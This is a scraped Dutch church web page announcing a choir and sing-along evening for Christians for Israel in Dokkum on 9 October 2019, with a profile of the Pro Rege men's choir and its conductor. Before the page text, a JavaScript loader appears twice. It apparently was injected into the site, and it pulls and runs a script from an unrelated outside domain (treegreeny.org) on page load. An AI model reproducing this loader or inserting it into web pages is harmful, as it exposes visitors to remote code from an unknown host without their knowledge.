;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Koor- en samenzangavond Christenen voor Israël in Dokkum - PKN Damwâld
9 oktober 2019
19:30 t/m 21:00
Koor- en samenzangavond Christenen voor Israël in Dokkum

Komt u ook op woensdag 9 oktober naar de koor- en samenzangavond in Dokkum? De zangavond onder het motto, zingen voor Israël, wordt gehouden in Kerkelijk Centrum De Herberg, Harddraversdijk 1. Aanvang is om 19.30 uur.
Muzikale medewerking wordt verleend door mannenkoor Pro Rege uit Dokkum o.l.v. dirigent Jan Hibma, Anja Heikamp-Kommerie op het orgel en Ronald Postema op de piano. Er zal ook veel samenzang zijn. Ds. Kees van Velzen houdt een korte meditatie.
Iedereen is van harte welkom. De toegang is vrij. Ook is er gelegenheid om producten uit Israël te kopen en er zal een boekentafel zijn.

Chr. Mannenkoor Pro Rege: Voor de Koning.
Chr. Mannenkoor Pro Rege bestaat uit meer dan 90 enthousiaste mannen die graag en veel zingen. Het mannenkoor is opgericht in 1965 heeft vele optredens en concerten gegeven op veel plaatsen in Nederland maar ook daarbuiten. Momenteel is Jan Hibma de dirigent. In de muziekwereld is Jan zeker geen onbekende want op 14 jarige leeftijd begon hij al met dirigeren. Ook speelde hij op jeugdige leeftijd mee in het Frysk Fanfare Orkest. Na de middelbare school studeerde hij aan de conservatoria van Leeuwarden en Hilversum. Naast nu 3 Friese mannenkoren is hij ook verbonden als dirigent bij enkele muziekverenigingen.